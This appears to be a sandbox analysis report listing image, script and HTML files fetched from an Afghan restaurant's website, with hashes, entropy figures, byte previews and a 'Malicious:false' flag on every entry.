                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):44675
                                                                                                                                                    Entropy (8bit):6.349379332660152
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:QidDiclU57weRozG+c/RlkhfoPHrKpmSlDORd:vIwO4fcKA3
                                                                                                                                                    MD5:448C5EF8D9E7DB7734C0E0B43D0FE077
                                                                                                                                                    SHA1:986F041AC8B134AFDA12DE60CA29E7E2DA599099
                                                                                                                                                    SHA-256:67AA3409DC75432C5F5E76DD1E9AAFE4E6914C53BDD1A249AE5751E90E7E16C4
                                                                                                                                                    SHA-512:9534BE07A1302E62B493964381DF1FE805DBE48F40707803402C6FDD3D893B8FD1662143037649CC3019D3D753C414DFA82B2F301289448F48144B8D77FC956C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Kabuli_Pallow.png
                                                                                                                                                    Preview:.PNG........IHDR.......K.....M.......pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=13, height=1068, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], baseline, precision 8, 2000x843, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):390429
                                                                                                                                                    Entropy (8bit):7.976240832816254
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:Lpz0IJx3FU94J75HkAXyg+We5t/ZYskjbXyNb7Ui1jKQS/2s57+l9HRGzxQ/2uVy:Lpz0aWo75HPi9W6/GPbiR7H3S/Tx+l9Q
                                                                                                                                                    MD5:E21D1FE8FEF912A9D3A96C891D9D002B
                                                                                                                                                    SHA1:8E7E6D21C18A02EE286628718B5498298760A47E
                                                                                                                                                    SHA-256:8C5A7499548F11411344EE544037D7EE6CB8C0FE2EF8D4B455271BF232DF41B7
                                                                                                                                                    SHA-512:FC2A14E362CA7AFE0E3919C941A9E4971A8FF9CEB6B7DC5DA016DC793C7C6E13701ACF411C3E34611B9B915D32110BA07D5196452580359AF365856D132B9A9D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:......Exif..MM.*...............@...........,...........................................................................(...........1.....".....2.......................i.............T.......-....'..-....'.Adobe Photoshop CC 2015 (Windows).2022:07:26 22:13:59.............0221....................0100..................................K.........................................................(.........................................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................C...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..`-h...<Ax._.{Ul.V.K ...d...
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 87 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):37258
                                                                                                                                                    Entropy (8bit):5.883696361162396
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:O50wTdDiwk45LR4U5UsT2TJurWPjOoSrP3/2eiQ62VG5p4RqR8iogjg:0tdDiwZR4U5b4uSjPSrP3/2eiQ1Gogk
                                                                                                                                                    MD5:A40A5D192C15FB7E9837BE7CA4D90987
                                                                                                                                                    SHA1:7E756DCED1420FD44B930895EDEB9DF511987351
                                                                                                                                                    SHA-256:3E659F8A2FEDCF865B20249B433A7724ACFF5A0EDADB0C8C595147636229F3E2
                                                                                                                                                    SHA-512:AE5089BD8C86B59282D9C2A8C1B09CE989F911EC1F9689E6CA096529113F820AEEC335F3EFB2B76F367FB22B8F6CAB2518D9F616A22942588C3B928130ED253D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...W...K.............pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1068, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):211641
                                                                                                                                                    Entropy (8bit):7.9633049198511126
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:0SdISdsVWq59TNstIAxawenNW+7kMA7VnWAYAcuf047VkmPdnbQ8:9dpdsVTNNs+AoweW0GpWAiucmPpQ8
                                                                                                                                                    MD5:F4EEF5FB8DFD15A00A7013C3061B1E6D
                                                                                                                                                    SHA1:2D11707F426F79CB4D293B2421CB5BC4FC2F005F
                                                                                                                                                    SHA-256:A6FE3C68A77AEC73579473040274BDAF9A159AC13F07B3D919F3BB141F53388F
                                                                                                                                                    SHA-512:806027E90FBE522A7D4136D976686F34A8AFBC7C4F00F443D114C934A601EA0B2A83FB9B9E2511740CBDD8B2DFC6B8CA171942B6018623179F64B1989AB844BF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....3!Exif..MM.*...............@...........,...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 22:27:13.............0221...................................................................r...........z.(................................1........H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..6.....0ID...t.).[KgY.....FUc@$...O..+..5..mc.$O.....Z=..O.I...........7
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 127 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):41872
                                                                                                                                                    Entropy (8bit):6.177885764015635
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:L50wwdDiZkB5gNlU52e/ZBVTwbJjvKDvB9omr2YyuYHiuUn+JTqWl4:d2dDiZZNlU52gB6NSD59oAYHiuYHWl4
                                                                                                                                                    MD5:ACBDB48E62F9567EE6AA445E691687B4
                                                                                                                                                    SHA1:E38A65B6EDB03E661D91C8C9D8E40C3264AD83FB
                                                                                                                                                    SHA-256:8B3E2A73F7BF6F2DCB7E7A4B16692792C7550EAA9C38FA7B2A8D1A84CECB100C
                                                                                                                                                    SHA-512:E2422F4234326594DA1DDF305B28DB4165C49EAC0594210BFD71C4A4EAF9A860CA609E32EFA78FA1C8380E3A294DB61624EC2F2A915BFED4FE092710B2A4946D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR.......K.....YVX.....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 180 x 180, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):82284
                                                                                                                                                    Entropy (8bit):7.336778051720278
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:Xi6EyWJIfl86LwKo42YLXAatcOBucfomo9MIXwllh8gxV:S6EPL1JYLwUqcAwZV
                                                                                                                                                    MD5:6122855657180B47E458E4DEC6511619
                                                                                                                                                    SHA1:92D9FC839A47F6836E87D4C66B5B430F0AFD5C62
                                                                                                                                                    SHA-256:6AFED547648B8E634370304FE0E06AE9D7F1D021DC80F76CC9DC6FF689053558
                                                                                                                                                    SHA-512:734C596D4FF002CF32CF6A0DB191EC221D5410E6E65F41A862DFA528931D6B4AEEE22B80D2521BF4201DF46ED793919D1D4BB8029A8B80353B98DA9C40961874
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR.............=..2....pHYs...............?ciTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmpMM:DocumentID>adobe:docid:photoshop:dc45d2e5-0cac-11ed-a552-baea9d3ae441</xmpMM:DocumentID>. <xmpMM:InstanceID>xmp.iid:88205e03-fe26-a4
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=4000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=6000], baseline, precision 8, 290x290, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):54948
                                                                                                                                                    Entropy (8bit):7.728661129285784
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:YC45/wJ45/wjhb6kNfgcnC3x1nmp840dr3zQ:v4FwJ4Fw9bOGKZrU
                                                                                                                                                    MD5:E0D22CBB9564B2C4A11D23534598CB1B
                                                                                                                                                    SHA1:DD9AE9903E022DAC1502AE8DC8C632CFE2F304E9
                                                                                                                                                    SHA-256:00785D626D2C694138A2566B7EC182A1ECA556261F393277ED82A8996AF18962
                                                                                                                                                    SHA-512:B952E3877776DCEC245A7A2BC5BDA2ACDB9641631A8663DAF21BE8921B2120BF26326BCBE674756019ADAA3859C7B6B190AA537A4F07D90C807DBE82C27385BF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....(9Exif..MM.*...............p...............................................................................................................(...........1.....".....2.........*.........................i.........@.%.........,...@......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:27 19:53:07....)...........2...........:."...........'...........0...........2.................0231...........B...........V...........j...........q...........x........................................................................................................65..........65..........65..........0100......................."...........".................................................................................................0...........1...........2..........4..........5.................................P........2023:08:19 16:25:59.2023:08:19 16:25:59.+10:00.+10:00.+10:00...`..........................................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1161
                                                                                                                                                    Entropy (8bit):4.64351392466228
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:qQYDYkSzH1hhkKRvLfA45ObiW9zRRZDk/P:qQYDYNbhTJV02WR8P
                                                                                                                                                    MD5:3124898DC7820BA5D6708F9490E8D839
                                                                                                                                                    SHA1:D6763EAC3BF8F6B7CB82DAE50B2FC7EA1255CF8B
                                                                                                                                                    SHA-256:7D6A1CE440920134DB29C97F93C5DD089A6B2C1B86020EAA54CAB431D5B31C9C
                                                                                                                                                    SHA-512:93CAD1D8BB6FC239E280178EF4CB35C255E08826C5D72B2FFB9009912B4EE2E1481AE7B88CEE016B87D73FB8B497DB710600ECE7EF403993ACB3E099482378C4
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:/*!.=========================================================.* FoodHut Landing page.=========================================================..* Copyright: 2019 DevCRUD (https://devcrud.com).* Licensed: (https://devcrud.com/licenses).* Coded by www.devcrud.com..=========================================================..* The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software..*/..// smooth scroll.$(document).ready(function(){. $(".navbar .nav-link").on('click', function(event) {.. if (this.hash !== "") {.. event.preventDefault();.. var hash = this.hash;.. $('html, body').animate({. scrollTop: $(hash).offset().top. }, 700, function(){. window.location.hash = hash;. });. } . });.});..new WOW().init();..function initMap() {. var uluru = {lat: 37.227837, lng: -95.700513};. var map = new google.maps.Map(documen
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=768, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1024], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):72716
                                                                                                                                                    Entropy (8bit):7.8711415728233245
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:GmwFNmwFUduqZy1IskBChemAjj/k6AWBXxpPQj6G53krK4:sF7FlqZy1IBOBanAWHpYjh3M
                                                                                                                                                    MD5:A7C57A779ECFDA0407835813579EDED9
                                                                                                                                                    SHA1:1B76AD47968B39146397BB151CC7E5EED4D03C87
                                                                                                                                                    SHA-256:D63BF08B2F36AFA3AE325CFF119427936ACC87244BD785412A5D8D3E6ACB1258
                                                                                                                                                    SHA-512:074AC6F380CA63CAD1CEB2D79F98430C5736DD95EE1CA91C8FC4EE0EC15127924AEECFB1DAC1BC3361CAAD3D0CBFB0F75C404EF97832228AA9E621B6977F5BC5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallery_new2.jpg
                                                                                                                                                    Preview:......Exif..MM.*.......................................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:12:28 00:05:57.............0221...................................................................r...........z.(.................................1.......H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....n....%.Yciy....l*.....S..`x..R=Kt@t.....n->.r.....{..G$<.:...D.'..>.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 64 x 45, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):17355
                                                                                                                                                    Entropy (8bit):2.8128135406405907
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:SSdb8kEWm+3UxNX7sc56PQR0jz5NsKVc7fND1LJWywhl:SSKk6h0QuHrG7fND1JSl
                                                                                                                                                    MD5:699D1E50392F1CA41CD7BAE266B617EF
                                                                                                                                                    SHA1:ED9D6195059F3606CF0A97D99B7AB21F74A92BD0
                                                                                                                                                    SHA-256:EE98BF1343D09633B12426AE8AA84E7762FB396301715ECA00CC3B32821C0B19
                                                                                                                                                    SHA-512:823C20AFF5FB3C456769058A6CF187A50DE045351B1C51E1B0131A1275117636BFAEE6364664A2420ABADF295B599FF872735FDF721C93748F5B30E59711034C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/food_menu_seafood.png
                                                                                                                                                    Preview:.PNG........IHDR...@...-.......mZ....pHYs...............;jiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2022-07-17T17:36:24+05:30</xmp:CreateDate>. <
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1066, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):139143
                                                                                                                                                    Entropy (8bit):7.941376976898881
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:aHLHa2wLi3brZzqqJz6CVWeSGd8J9xYjApKlAT:aHLHDei3JBVvu9+sKiT
                                                                                                                                                    MD5:9660C9822BBBBE2415EA39041C96E552
                                                                                                                                                    SHA1:4731F13D5DB79423D2418599E583C013683901DE
                                                                                                                                                    SHA-256:D52A753AA2C0D1BA66E74DD52B3ADAB01A45C513B8A8A778510F37DDBADD0133
                                                                                                                                                    SHA-512:9B47D70D4E99AA9F68012FE3AAAF032048341E13607D005B93EE06F1B5F01B58C74F5BFDF449520ACBBF614CEF8E7443A1002A3CF6F32898E522A97A9B6BA307
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....,.Exif..MM.*...............@...........*...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 22:08:32.............0221...................................................................r...........z.(................................+m.......H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..c..Zv.r...&~;.7.n.-.t.j<.+...I. h......O.b.f.....'.Q..r..8.@{...[.[sj..[.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 113 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):39813
                                                                                                                                                    Entropy (8bit):6.0694772837031215
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:bzdDiHYU5NigckBaO7Kj2kPkCCKJsaOSJLoIsO:1EigcY2jLPD9lu9O
                                                                                                                                                    MD5:20CC5B886607398A0B908074BD6499DC
                                                                                                                                                    SHA1:0013C5DC568719740EE9AC64BDD4C5AA550819BE
                                                                                                                                                    SHA-256:A5DEC3C0103DA8FFAD9DC87467EC6FC9851AB2F097067119B399E1AF75B33AA3
                                                                                                                                                    SHA-512:EEBEAEDC7498442BC66D2B8E74A3FB7CD30546176B6C14CFB366443F7229A52FB559AE11075E07877D6B8A394688996D741CD5431D7604D2E87F25DB6AF337EC
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...q...K.....G.h.....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1200, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):167711
                                                                                                                                                    Entropy (8bit):7.957215937268096
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:NyvGyvlV6u9ad6LgUiKI4r6DX0WTaa6Vw/on/fqzFw6gq:NcGcl9ad6LgdDK6WwwfqzFw+
                                                                                                                                                    MD5:9B30FFFB0F089CF197B6D1EFB733C678
                                                                                                                                                    SHA1:FDB575E825D90E4036EBBECD7336022293CD5D99
                                                                                                                                                    SHA-256:09625AC85911FECB47BB2A3E5E61F43ABF72B79C435A855068976946E18CDA3B
                                                                                                                                                    SHA-512:07770C97493740DFDA647DFE42A179DE865D36A9F22773C575FC8AEA775EEEDE657A611EE863718954BF55690DCB0187FDD31976A970A2F2ADAF120E96A2A9F8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....(.Exif..MM.*...............@.......................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:22 19:33:34.............0221...................................................................r...........z.(................................&........H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....a.P.w.....f..R...jU.f.p......Qo..........0.A.F...t.....VU#".......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (7389), with CRLF line terminators
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):16401
                                                                                                                                                    Entropy (8bit):5.488742965105142
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:gYLXjVAJprW352OAYQ1dTzLBrrobv75fld1qmSF2/s:V0852zYQ1dTztrrobv75fld1qmSF2E
                                                                                                                                                    MD5:7D11BB96AA4A4508D653971F675E4D45
                                                                                                                                                    SHA1:AF83C2B3149FE4B7E0A8F6CE9455D8DBE2669814
                                                                                                                                                    SHA-256:C7F3395DA21D385962F00F687E6B27DFD39812AA8DE892858A56E39691F1E0C3
                                                                                                                                                    SHA-512:CF49E77367ABCCA1B81DC5FBE289399F6AAC63A7C6C2D3E4E9623C0561172CF5A271445AABFB3DC1B56B51E529980CA0D06AEE8BF1D46D98187B5612674C9FB7
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/contactUs
                                                                                                                                                    Preview:<!DOCTYPE html>..<html lang="en">..<head>...<meta charset="utf-8">.. <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.. <meta name="author" content="AdagraPro">.. <title>Afghan Hayat Restaurant</title>.. <link rel="shortcut icon" type="image/x-icon" href="favicon.ico" />.... font icons -->.. <link rel="stylesheet" href="assets/vendors/themify-icons/css/themify-icons.css">.. <link rel="stylesheet" href="assets/vendors/animate/animate.css">.... Bootstrap + FoodHut main styles -->...<link rel="stylesheet" href="assets/css/foodhut.css">.. <link rel="stylesheet" href="assets/css/custom.css">.... Google font styles -->.. <link rel="preconnect" href="https://fonts.googleapis.com">.. <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>.. <link href="https://fonts.googleapis.com/css2?family=Dancing+Script:wght@500;600;700&family=Edu+TAS+Beginner&family=Mochiy+Pop+One&family=Pacifico&displ
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1600, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1200], progressive, precision 8, 498x1436, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):92120
                                                                                                                                                    Entropy (8bit):7.910175763446956
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:3JsGJs6ctvhxiMPyGX0epGoM5qJx2frUKz8GZXyYBhpVTcKUnOOymXOpooFTLhT:3GGGvvg2GokzLVBXTcKUnOPmUood1T
                                                                                                                                                    MD5:D996F6EF932D8F371D778D23AD0F9576
                                                                                                                                                    SHA1:ECF9849247B94D898964ECC6851E849BC43A2065
                                                                                                                                                    SHA-256:1F2245002B7CF48541CBFFA5C6E8514B73C9BA7B40AB08BC07A756AF0A16B67B
                                                                                                                                                    SHA-512:3ECC60878C5A7B7E6774744CD941FD27CFFD7F337F3727A2060570F30F5E75706A32005D464EA7E183403BD50746945BC40482D8DE062A14185C04B75B93C7D5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/img_recipe_6.jpg
